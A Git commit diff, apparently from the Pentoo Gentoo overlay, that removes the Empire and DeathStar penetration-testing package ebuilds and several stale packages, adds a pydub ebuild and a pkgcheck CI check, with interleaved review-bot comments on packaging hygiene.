Clean the tree of non-existant deps and check now

pentoo-exploits: drop empire (and deathstar)
Also drop keywords from empire since it can't be installed.
also drop deathstar and its keywords since it requires empire
sdrtrunk: fix non-existent deps
remove freeradius
bump icad-tone-detection
pydub: import from guru
drop dependency-check-bin
drop old grpcio-tools
update evalhook
drop openscap-daemon, nothing but "random" for years
Rick Farina (Zero_Chaos) 2025-04-26 12:49:59 -04:00
parent c3e707608e
commit 9ea45d02fd
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
50 changed files with 76 additions and 3068 deletions


@ -25,4 +25,4 @@ jobs:
- name: Commit pkgcheck warnings - name: Commit pkgcheck warnings
uses: pkgcore/pkgcheck-action@v1 uses: pkgcore/pkgcheck-action@v1
with: with:
args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep --commits HEAD^..${{ github.sha }} args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep,NonexistentDeps --commits HEAD^..${{ github.sha }}
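Review bot: `uses: pkgcore/pkgcheck-action@v1` in this step (and in the identical step of the next workflow file) follows a mutable tag, so the code that runs in CI can change without any commit in this repository. Pinning it to a full commit SHA, e.g. `uses: pkgcore/pkgcheck-action@<FULL_COMMIT_SHA> # v1`, would make the run reproducible and any action update reviewable. The job's triggers and permissions are outside the hunk, so what a changed action could reach cannot be judged from here. Separately, the long `-k` list is maintained by hand in both files and the copies already differ (`-UnknownProfilePackage` appears only in the second); a one-line comment in each file saying whether that is intended would help the next edit.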


@ -26,4 +26,4 @@ jobs:
- name: Commit pkgcheck warnings - name: Commit pkgcheck warnings
uses: pkgcore/pkgcheck-action@v1 uses: pkgcore/pkgcheck-action@v1
with: with:
args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-UnknownProfilePackage,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep --commits HEAD^..${{ github.sha }} args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-UnknownProfilePackage,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep,NonexistentDeps --commits HEAD^..${{ github.sha }}


@ -1,2 +1 @@
DIST deathstar-20201217.tar.gz 44220 BLAKE2B ba1e9c295a76201c7987e7759cb3c8ecd2c212f6269ef2fc3392db2ef2cb993fa2af860f29e514f580940b9b02ee7dc777747924e961aad72365b8970bdd337e SHA512 4af3b356e548be04ea03989af7c43e302cf1b2c4ec7c10fedf7d4fb6d426bcfe947bbb42312912505c88cbd0e21705fd41d279bbb048f7fa5450f25ddd58f2b7
DIST deathstar-20210519.tar.gz 44204 BLAKE2B 186951fde53ea132cf6bbe35f478b0e97e2163665e599f29666ce291a58744d4c33a463aea75f668a41a68b45c06210ebec7870a01b45fb712693e638e9a445c SHA512 2029c49432f273fc7534d98114075dca4330d8900835e2d754fc021e7b0844a092a9818389e8d86f58f30206b60991394b7bd3ed222343ebab92522e74a12b2c DIST deathstar-20210519.tar.gz 44204 BLAKE2B 186951fde53ea132cf6bbe35f478b0e97e2163665e599f29666ce291a58744d4c33a463aea75f668a41a68b45c06210ebec7870a01b45fb712693e638e9a445c SHA512 2029c49432f273fc7534d98114075dca4330d8900835e2d754fc021e7b0844a092a9818389e8d86f58f30206b60991394b7bd3ed222343ebab92522e74a12b2c


@ -1,61 +0,0 @@
# Copyright 1999-2022 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=poetry
PYTHON_COMPAT=( python3_{11..13} )
inherit distutils-r1
DESCRIPTION="A tool to gain Domain Admin rights with a push of a button"
HOMEPAGE="https://github.com/byt3bl33d3r/DeathStar"
HASH_COMMIT="1ced058fcbd73e89f13967cbadc1d375dc48f1d1"
SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz"
KEYWORDS="~amd64 ~x86"
LICENSE="GPL-3"
SLOT="0"
#requirements.txt
RDEPEND="${PYTHON_DEPS}
app-exploits/empire
dev-python/certifi[${PYTHON_USEDEP}]
dev-python/colorama[${PYTHON_USEDEP}]
dev-python/commonmark[${PYTHON_USEDEP}]
dev-python/h11[${PYTHON_USEDEP}]
dev-python/httpcore[${PYTHON_USEDEP}]
dev-python/httpx[${PYTHON_USEDEP}]
dev-python/idna[${PYTHON_USEDEP}]
dev-python/pygments[${PYTHON_USEDEP}]
dev-python/rfc3986[${PYTHON_USEDEP}]
dev-python/rich[${PYTHON_USEDEP}]
dev-python/sniffio[${PYTHON_USEDEP}]
dev-python/typing-extensions[${PYTHON_USEDEP}]
"
S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
src_prepare() {
default
# exclude is not supported by pyproject2setuppy
sed -i '/^exclude/,/^\]/d' pyproject.toml || die
}
#src_prepare() {
# sed -i \
# -e "s/__version__ = '\(.*\)'/__version__ = '${PV}'/" \
# DeathStar.py || die
# default
#}
#src_install() {
# python_foreach_impl python_newscript DeathStar.py $PN
# dodoc README.md
#}
pkg_postinst() {
einfo "\nSee the following URL:"
einfo " * https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html\n"
}


@ -1,4 +1,4 @@
# Copyright 1999-2022 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -14,7 +14,9 @@ HOMEPAGE="https://github.com/byt3bl33d3r/DeathStar"
HASH_COMMIT="f10fdbfeb149d9b5647b397e1ce7fa8ab0d39799" HASH_COMMIT="f10fdbfeb149d9b5647b397e1ce7fa8ab0d39799"
SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz" SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz"
KEYWORDS="~amd64 ~x86" S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
#KEYWORDS="~amd64 ~x86"
LICENSE="GPL-3" LICENSE="GPL-3"
SLOT="0" SLOT="0"
@ -42,8 +44,6 @@ RDEPEND="${PYTHON_DEPS}
distutils_enable_tests pytest distutils_enable_tests pytest
S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
src_prepare() { src_prepare() {
default default
# exclude is not supported by pyproject2setuppy # exclude is not supported by pyproject2setuppy
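Review bot: `#KEYWORDS="~amd64 ~x86"` leaves a commented-out assignment with no reason recorded in the ebuild, and the remaining empire ebuild is changed the same way. I would replace the dead line with an explanatory comment such as `# unkeyworded: depends on app-exploits/empire, which cannot currently be installed`, and add a matching comment in the empire ebuild naming what blocks installation. That keeps the reason, and the condition for restoring the keywords, next to the code instead of only in the commit message. src_prepare continues past the end of the last hunk.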


@ -5,4 +5,7 @@
<email>unknown@pentoo.ch</email> <email>unknown@pentoo.ch</email>
<name>Author Unknown</name> <name>Author Unknown</name>
</maintainer> </maintainer>
<upstream>
<remote-id type="github">byt3bl33d3r/DeathStar</remote-id>
</upstream>
</pkgmetadata> </pkgmetadata>


@ -1,2 +1 @@
DIST empire-6.0.0.tar.gz 38108157 BLAKE2B f53ced8e3a90f51018ddd469455e0c165fb7af8aab769b2b75570dc2a2f814900d097988c208102b911896cb3b31b53e92119dfce3af20dbb7c2e307fc3ee5c6 SHA512 8de2ca9c46cf0c324dcf407b152e0dc0079078b9d771dda885e93b75645ea81eb335a2eb72a7f41995d56855abed0c58687ab63a5a8ff419b9b431b533215c8a
DIST empire-6.0.2.tar.gz 38107974 BLAKE2B 7169a51aa22895a738d85b5ae18867dfb10f78e59ff65db82ba7fffc725c8590e7fdab902b943bc1a80a0f3a827c10fd3b63052b725774a388c7d9aab2be894b SHA512 448ff62446132d736c4a1a6bc2d8abb0168d8c32841ecf2073cf3577e906cc29ea7f09bb3d227e8a8da635f0f107f36cfeed50ddd48e4bdb237c3cc8ce3f99dc DIST empire-6.0.2.tar.gz 38107974 BLAKE2B 7169a51aa22895a738d85b5ae18867dfb10f78e59ff65db82ba7fffc725c8590e7fdab902b943bc1a80a0f3a827c10fd3b63052b725774a388c7d9aab2be894b SHA512 448ff62446132d736c4a1a6bc2d8abb0168d8c32841ecf2073cf3577e906cc29ea7f09bb3d227e8a8da635f0f107f36cfeed50ddd48e4bdb237c3cc8ce3f99dc


@ -1,137 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=poetry
PYTHON_COMPAT=( python3_{11..13} )
PYTHON_REQ_USE="sqlite"
inherit wrapper python-single-r1
DESCRIPTION="A post-exploitation framework"
HOMEPAGE="https://github.com/BC-SECURITY/Empire"
SRC_URI="https://github.com/BC-SECURITY/Empire/archive/v${PV}.tar.gz -> ${P}.tar.gz"
S="${WORKDIR}/Empire-${PV}"
LICENSE="BSD"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE="powershell java"
REQUIRED_USE="powershell? ( !x86 )
${PYTHON_REQUIRED_USE}"
# https://github.com/BC-SECURITY/Empire/issues/196
RDEPEND="${PYTHON_DEPS}
$(python_gen_cond_dep '
dev-python/urllib3[${PYTHON_USEDEP}]
dev-python/requests[${PYTHON_USEDEP}]
dev-python/macholib[${PYTHON_USEDEP}]
dev-python/pyopenssl[${PYTHON_USEDEP}]
dev-python/zlib_wrapper[${PYTHON_USEDEP}]
dev-python/jinja2[${PYTHON_USEDEP}]
dev-python/pyparsing[${PYTHON_USEDEP}]
dev-python/pymysql[${PYTHON_USEDEP}]
dev-python/sqlalchemy[${PYTHON_USEDEP}]
dev-python/pyyaml[${PYTHON_USEDEP}]
dev-python/sqlalchemy_utc[${PYTHON_USEDEP}]
dev-python/terminaltables3[${PYTHON_USEDEP}]
dev-python/pycryptodome[${PYTHON_USEDEP}]
dev-python/cryptography[${PYTHON_USEDEP}]
>=dev-python/fastapi-0.115.11[${PYTHON_USEDEP}]
>=dev-python/uvicorn-0.34.0[${PYTHON_USEDEP}]
>=dev-python/jq-1.8.0[${PYTHON_USEDEP}]
>=dev-python/aiofiles-24.1.0[${PYTHON_USEDEP}]
>=dev-python/python-multipart-0.0.20[${PYTHON_USEDEP}]
>=dev-python/python-socketio-5.12.1[${PYTHON_USEDEP}]
>=dev-python/flask-3.1.0[${PYTHON_USEDEP}]
>=dev-python/python-obfuscator-0.0.2[${PYTHON_USEDEP}]
>=dev-python/pyinstaller-6.12.0[${PYTHON_USEDEP}]
>=dev-python/packaging-24.2[${PYTHON_USEDEP}]
>=dev-python/netaddr-1.3.0[${PYTHON_USEDEP}]
>=dev-python/bcrypt-4.0.1[${PYTHON_USEDEP}]
>=dev-python/requests-file-2.1.0[${PYTHON_USEDEP}]
dev-python/pysecretsocks[${PYTHON_USEDEP}]
dev-python/donut-shellcode[${PYTHON_USEDEP}]
')
powershell? (
!x86? ( app-shells/pwsh-bin ) )
java? (
|| ( virtual/jre:* virtual/jdk:* ) )"
DEPEND="${RDEPEND}"
pkg_setup() {
python-single-r1_pkg_setup
}
src_prepare() {
python_fix_shebang "${S}"
default
}
#https://github.com/BC-SECURITY/Empire/issues/39
src_install() {
insinto "/usr/share/${PN}"
doins -r empire/ empire.py
# python_optimize "${D}/usr/share/${PN}/lib"
make_wrapper $PN \
"${PYTHON} /usr/share/${PN}/empire.py" \
"/usr/share/${PN}"
dodoc README.md Dockerfile changelog
}
pkg_config() {
local _yesno_ask
local _em_home="${EROOT}/usr/share/${PN}"
pushd "${_em_home}" >/dev/null || die
if [ -f "${_em_home}/data/empire.db" ]; then
ewarn "Drop old database "${_em_home}/data/empire.db" for new configuring ..."
read -r -p " [>] Are you sure? [y/N] " _yesno_ask
if [[ ${_yesno_ask,,} =~ ^(yes|y)$ ]]; then
rm -f data/empire.db > /dev/null 2>&1 || die
else
return
fi
fi
ebegin "Press ENTER to create password for database or Control-C to abort now"
python3 setup/setup_database.py
eend ${?} || die
if [ -f "${_em_home}/data/empire-chain.pem" ] || [ -f "${_em_home}/data/empire-priv.key" ]; then
ewarn "Drop old ${_em_home}/data/empire-chain.pem and generate new cert ..."
read -r -p " [>] Are you sure? [y/N] " _yesno_ask
if [[ ${_yesno_ask,,} =~ ^(yes|y)$ ]]; then
rm -f data/{empire-chain.pem,empire-priv.key} > /dev/null 2>&1 || die
else
return
fi
fi
openssl req -newkey rsa:2048 -new -nodes -x509 \
-subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.pentoo.ch" \
-keyout data/empire-priv.key \
-out data/empire-chain.pem || die
popd >/dev/null || die
}
pkg_postinst() {
ewarn "\nWarning. This software does not support system-wide installation"
ewarn "See the following bug report for more details:"
ewarn "https://github.com/BC-SECURITY/Empire/issues/39"
ewarn
ewarn "You need to run it from /usr/share/${PN} directory under 'root' account"
ewarn "\nPlease configure your installation before using:"
ewarn " emerge --config \"=${CATEGORY}/${PF}\"\n"
}


@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -16,7 +16,7 @@ S="${WORKDIR}/Empire-${PV}"
LICENSE="BSD" LICENSE="BSD"
SLOT="0" SLOT="0"
KEYWORDS="~amd64 ~x86" #KEYWORDS="~amd64 ~x86"
IUSE="powershell java" IUSE="powershell java"
REQUIRED_USE="powershell? ( !x86 ) REQUIRED_USE="powershell? ( !x86 )
${PYTHON_REQUIRED_USE}" ${PYTHON_REQUIRED_USE}"


@ -1 +0,0 @@
DIST openscap-daemon-0.1.10.tar.gz 820662 BLAKE2B 1167518f0534dc9f494f889892acbf7d74a86af6caf22220345516c39ed4863cbdd0a4064d9ee291ed7eccd81ab057241db2b04ee28d79a0c1f3c5152154e8a9 SHA512 93946b390cc95281b606967df783b8be6beb83da9fbca1951f2095dc24abe518440b6f967b29ae2b093536abe9af4effc3776e8d30f0ab2193b923c1bcf54e17


@ -1,15 +0,0 @@
diff -ur a/setup.py b/setup.py
--- a/setup.py 2018-02-08 18:52:16.000000000 +0300
+++ b/setup.py 2019-07-07 00:50:24.699965784 +0300
@@ -57,10 +57,8 @@
data_files=[
(os.path.join("/", "etc", "dbus-1", "system.d"),
["org.oscapd.conf"]),
- (os.path.join("/", "usr", "lib", "systemd", "system"),
+ (os.path.join("/", "lib", "systemd", "system"),
["oscapd.service"]),
- (os.path.join("/", "usr", "share", "doc", "openscap-daemon"),
- ["README.md", "LICENSE"]),
(os.path.join("/", "usr", "share", "man", "man8"),
["man/oscapd.8", "man/oscapd-cli.8", "man/oscapd-evaluate.8"]),
],


@ -1,11 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2019 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
description="OpenSCAP Daemon"
command="/usr/bin/oscapd"
command_background="true"
pidfile="/run/${RC_SVCNAME}.pid"
start_stop_daemon_args="--quiet -1 /var/log/${RC_SVCNAME}.log -2 /var/log/${RC_SVCNAME}.log"
# vim: set ft=gentoo-init-d ts=4 :


@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<email>email@linxon.ru</email>
<name>Yury Martynov</name>
</maintainer>
</pkgmetadata>


@ -1,44 +0,0 @@
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=setuptools
PYTHON_COMPAT=( python3_{11..13} )
PYTHON_REQ_USE="xml"
inherit distutils-r1
DESCRIPTION="Manages continuous scans of your infrastructure"
HOMEPAGE="https://www.open-scap.org/tools/openscap-daemon"
SRC_URI="https://github.com/OpenSCAP/openscap-daemon/archive/${PV}.tar.gz -> ${P}.tar.gz"
LICENSE="LGPL-2.1"
SLOT=0
KEYWORDS="~amd64"
IUSE="test"
REQUIRED_USE="${PYTHON_REQUIRED_USE}"
RESTRICT="!test? ( test )"
RDEPEND="${PYTHON_DEPS}
app-forensics/openscap
app-forensics/scap-security-guide
dev-python/dbus-python[${PYTHON_USEDEP}]
dev-python/pygobject[${PYTHON_USEDEP}]"
PATCHES=( "${FILESDIR}"/${P}_gentoo.patch )
src_test() {
tests/unit/make_check || die
tests/integration/make_check || die
}
src_install() {
distutils-r1_src_install
newinitd "${FILESDIR}"/oscapd.initd oscapd
keepdir "/var/lib/oscapd" "/etc/oscapd"
dodoc container/config.ini
}


@ -1,4 +1,4 @@
# Copyright 1999-2023 Gentoo Foundation # Copyright 1999-2025 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -7,7 +7,7 @@ HASH_COMMIT="bf63f72a0ead21a0ffb9c2ed4c791262ed55a07c"
MY_S="${WORKDIR}/php-eval-hook-${HASH_COMMIT}" MY_S="${WORKDIR}/php-eval-hook-${HASH_COMMIT}"
PHP_EXT_NAME=evalhook PHP_EXT_NAME=evalhook
USE_PHP="php8-1 php8-2" USE_PHP="php8-2"
PHP_EXT_S="${MY_S}" PHP_EXT_S="${MY_S}"
inherit php-ext-source-r3 inherit php-ext-source-r3
@ -15,15 +15,10 @@ DESCRIPTION="Decode/Deobfuscate PHP Scripts"
HOMEPAGE="https://github.com/extremecoders-re/php-eval-hook" HOMEPAGE="https://github.com/extremecoders-re/php-eval-hook"
SRC_URI="https://github.com/extremecoders-re/php-eval-hook/archive/${HASH_COMMIT}.tar.gz -> ${P}.gh.tar.gz" SRC_URI="https://github.com/extremecoders-re/php-eval-hook/archive/${HASH_COMMIT}.tar.gz -> ${P}.gh.tar.gz"
S="${MY_S}"
LICENSE="MIT" LICENSE="MIT"
SLOT="0" SLOT="0"
KEYWORDS="~amd64" KEYWORDS="~amd64"
IUSE=""
RDEPEND=""
DEPEND="${RDEPEND}"
S="${MY_S}"
src_prepare() { src_prepare() {
php-ext-source-r3_src_prepare php-ext-source-r3_src_prepare


@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<name>No one</name>
<email>noone@pentoo.org</email>
</maintainer>
<upstream>
<remote-id type="github">extremecoders-re/php-eval-hook</remote-id>
</upstream>
</pkgmetadata>


@ -1 +1 @@
DIST grpcio-testing-1.62.0.tar.gz 22474 BLAKE2B 6c8c23eb4d7c645278496067a74583ce930eb16f39a262ce8b45f1029d6d6bf97ff6dab305f27bea4f4d5333a74fa185957d33499b49f02b711eb94cab0ff065 SHA512 6285a5c5b28114969738e1815327c14651ee2bc2e6b6c4093cea980ae2ad3f0aa8d53fc7b1e9125e5c47862c66891129e6420ad0d6896a2f789ca7e9fc66ce43 DIST grpcio_testing-1.71.0.tar.gz 22483 BLAKE2B 0c935103785d229502646be2ecc936e64d0046a5a0b1b3dfee5a65aee74342b0177a2b614cb0f7f2e3ecf646ef0360a205c5ea5164a5af7f24ea1392ff802bb5 SHA512 71f6b1a33ca5e7b374c7a3d637518d82e743c7da09e689877dc1c94ab346b4d0e602d626544aa7f25a415474b3330ceda162a56465586b91d016c96aa01483e5


@ -6,7 +6,7 @@ EAPI=8
DISTUTILS_USE_PEP517=setuptools DISTUTILS_USE_PEP517=setuptools
PYTHON_COMPAT=( python3_{11..13} ) PYTHON_COMPAT=( python3_{11..13} )
DISTUTILS_USE_PEP517=setuptools DISTUTILS_USE_PEP517=setuptools
PYPI_NO_NORMALIZE=1 PYPI_PN="grpcio_testing"
inherit distutils-r1 pypi inherit distutils-r1 pypi
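Review bot: `DISTUTILS_USE_PEP517=setuptools` is assigned twice in the lines around the new `PYPI_PN="grpcio_testing"`, once before and once after `PYTHON_COMPAT`. The second assignment is redundant and can be dropped while this block is being touched. The rest of the ebuild is outside the hunk.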


@ -1,9 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<!-- maintainer-needed -->
<upstream>
<remote-id type="github">grpc/grpc</remote-id>
<remote-id type="pypi">grpcio-testing</remote-id>
</upstream>
</pkgmetadata>


@ -1,2 +1 @@
DIST grpcio_tools-1.67.0.tar.gz 5159163 BLAKE2B 54a7db77514033c4747d20a13fded114828fed23f649587c649f5ad2716d4bb31b80eeda560d55ae087a564cb9d34563a612cc91df581ae6b9a761f307828397 SHA512 f9644b4424aa68f1ae4d679c7b635db9bbfc0b493c76caf7d2e9fe0a49e5e81b6f146666c8dba3fc1d1c0db141f8fb362dd0ede0842c34cb178009412a672ec5
DIST grpcio_tools-1.71.0.tar.gz 5326008 BLAKE2B 70dae192880c861e659f1901e00d7189637843c25c309791857fdc1ef58692fcd3a42d34587896b67d19b2a067561d0cc51e5c9f530352d5345fd06f00fea045 SHA512 33ec4c4a5f09e41af3c20cf030a16f69b8b9d0b8f107f84be6666afce026367d710c0fe4b383f3b45a56e3403fd4f23309ca16ea7d1a122245572868bf7a1507 DIST grpcio_tools-1.71.0.tar.gz 5326008 BLAKE2B 70dae192880c861e659f1901e00d7189637843c25c309791857fdc1ef58692fcd3a42d34587896b67d19b2a067561d0cc51e5c9f530352d5345fd06f00fea045 SHA512 33ec4c4a5f09e41af3c20cf030a16f69b8b9d0b8f107f84be6666afce026367d710c0fe4b383f3b45a56e3403fd4f23309ca16ea7d1a122245572868bf7a1507


@ -1,58 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_EXT=1
PYTHON_COMPAT=( python3_{11..13} )
DISTUTILS_USE_PEP517=setuptools
inherit distutils-r1 multiprocessing prefix pypi
DESCRIPTION="Protobuf code generator for gRPC"
HOMEPAGE="https://grpc.io"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="amd64 ~arm ~arm64 ~x86"
RDEPEND="
~dev-python/grpcio-${PV}[${PYTHON_USEDEP}]
>=dev-python/protobuf-5.26.1[${PYTHON_USEDEP}]
<dev-python/protobuf-6[${PYTHON_USEDEP}]
"
DEPEND="${RDEPEND}"
BDEPEND="
virtual/pkgconfig
dev-python/cython[${PYTHON_USEDEP}]
"
python_prepare_all() {
distutils-r1_python_prepare_all
hprefixify setup.py
#absl/base/config.h ABSL_LTS_RELEASE_VERSION
# system: 20240722
#google/protobuf/wrappers.pb.h
# Protobuf C++ Version: 5.28.0
# PROTOBUF_VERSION
# protobuf/compiler/versions.h
# #define PROTOBUF_CPP_VERSION_STRING
# use system protobuf
# sed -r -i \
# -e '/^CC_FILES=\[/,/\]/{/^CC_FILES=\[/n;/\]/!d;}' \
# -e '/^CC_INCLUDES=\[/,/\]/{/^CC_INCLUDES=\[/n;/\]/!d;}' \
# -e "s@^(PROTO_INCLUDE=')[^']+'@\1/usr/include'@" \
# -e '/^PROTOBUF_SUBMODULE_VERSION=/d' \
# protoc_lib_deps.py
# fix the include path
# ln -s ../../../.. grpc_root
}
python_configure_all() {
export GRPC_PYTHON_BUILD_WITH_CYTHON=1
export GRPC_PYTHON_BUILD_EXT_COMPILER_JOBS="$(makeopts_jobs)"
}


@ -0,0 +1,38 @@
# Copyright 2022-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
PYTHON_COMPAT=( python3_{11..12} )
DISTUTILS_USE_PEP517=setuptools
inherit distutils-r1 optfeature
DESCRIPTION="Manipulate audio with an simple and easy high level interface"
HOMEPAGE="http://pydub.com/"
SRC_URI="https://github.com/jiaaro/${PN}/archive/refs/tags/v${PV}.tar.gz -> ${P}.tar.gz"
LICENSE="MIT"
SLOT="0"
KEYWORDS="~amd64"
IUSE="test"
RESTRICT="!test? ( test )"
BDEPEND="
test? (
media-video/ffmpeg[lame,vorbis]
)
"
distutils_enable_tests unittest
python_test() {
eunittest test/
}
pkg_postinst() {
optfeature "opening and saving non-wav files - like mp3" media-video/ffmpeg
#optfeature "playing audio" dev-python/simpleaudio # upstream suggests this, not available in gentoo or guru
optfeature "playing audio" dev-python/pyaudio
}
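Review bot: `HOMEPAGE="http://pydub.com/"` points users at a plain-HTTP URL; if the site answers over TLS, this should be `HOMEPAGE="https://pydub.com/"`. `PYTHON_COMPAT=( python3_{11..12} )` stops one version short of the `python3_{11..13}` used by the other ebuilds in this commit, so either extend it or add a short comment saying why 3.13 is excluded. DESCRIPTION also has a typo: "an simple" should read "a simple".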


@ -1,2 +0,0 @@
DIST dependency-check-bin-5.3.2.zip 19997190 BLAKE2B 85f65246ebe0ecf80a2c5a1ed0dce6aa470cc5a6efd32f2feb7fd29f55c53a4a717cc9dfc8fdb39961a4c31a235649d5fa3508b1161f65a338375dc66b0e8324 SHA512 62fd9362004267867c423879ef26643971241908c3fffb7f6e563c930e16655bf3399009deda9d9c33069064cafa0cec3efb07e77ab3a52fa66b73dbc0ef172b
DIST dependency-check-bin-6.2.2.zip 27083228 BLAKE2B aa33e1714fab88ec2a1ac1be40d7f418d34a85a88d1609ffbca5b0b7439ede158ea24e4d1fa69b7a0b2f122da54a197dbfc1205d524344de8ac714e7393a2011 SHA512 55af3f6af69ae4e4de0653f1f735c2fd43455ce146f29d4d88c60014215f0f1be4a78953c2ea0fc62733f711723595f308d153e3cce0108f59c303833e5e762c


@ -1,34 +0,0 @@
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
MY_PN="dependency-check"
DESCRIPTION="A utility that detects vulnerabilities in application dependencies"
HOMEPAGE="https://www.owasp.org/index.php/OWASP_Dependency_Check"
SRC_URI="https://dl.bintray.com/jeremy-long/owasp/dependency-check-${PV}-release.zip -> ${P}.zip"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE=""
DEPEND=">=virtual/jdk-1.7
dev-java/ant-core
app-arch/unzip"
RDEPEND=">=virtual/jre-1.7"
S="${WORKDIR}/${MY_PN}"
src_prepare() {
sed -i -e 's|^PRGDIR=.*|PRGDIR="/etc/dependency-check"|' bin/${MY_PN}.sh || die "Sed failed!"
sed -i -e 's|^BASEDIR=`cd "$PRGDIR/.."|BASEDIR=`cd "$PRGDIR"|' bin/${MY_PN}.sh || die "Sed failed!"
eapply_user
}
src_install() {
dodir /etc/${MY_PN}
insinto /etc/${MY_PN}
doins -r lib plugins
newsbin bin/${MY_PN}.sh ${MY_PN}
}


@ -1,34 +0,0 @@
# Copyright 1999-2021 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
MY_PN="dependency-check"
DESCRIPTION="A utility that detects vulnerabilities in application dependencies"
HOMEPAGE="https://www.owasp.org/index.php/OWASP_Dependency_Check"
SRC_URI="https://github.com/jeremylong/DependencyCheck/releases/download/v6.2.2/dependency-check-${PV}-release.zip -> ${P}.zip"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE=""
DEPEND=">=virtual/jdk-1.7
dev-java/ant-core
app-arch/unzip"
RDEPEND=">=virtual/jre-1.7"
S="${WORKDIR}/${MY_PN}"
src_prepare() {
sed -i -e 's|^PRGDIR=.*|PRGDIR="/etc/dependency-check"|' bin/${MY_PN}.sh || die "Sed failed!"
sed -i -e 's|^BASEDIR=`cd "$PRGDIR/.."|BASEDIR=`cd "$PRGDIR"|' bin/${MY_PN}.sh || die "Sed failed!"
eapply_user
}
src_install() {
dodir /etc/${MY_PN}
insinto /etc/${MY_PN}
doins -r lib plugins
newsbin bin/${MY_PN}.sh ${MY_PN}
}


@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<email>unknown@pentoo.ch</email>
<name>Author Unknown</name>
</maintainer>
</pkgmetadata>


@ -1 +1 @@
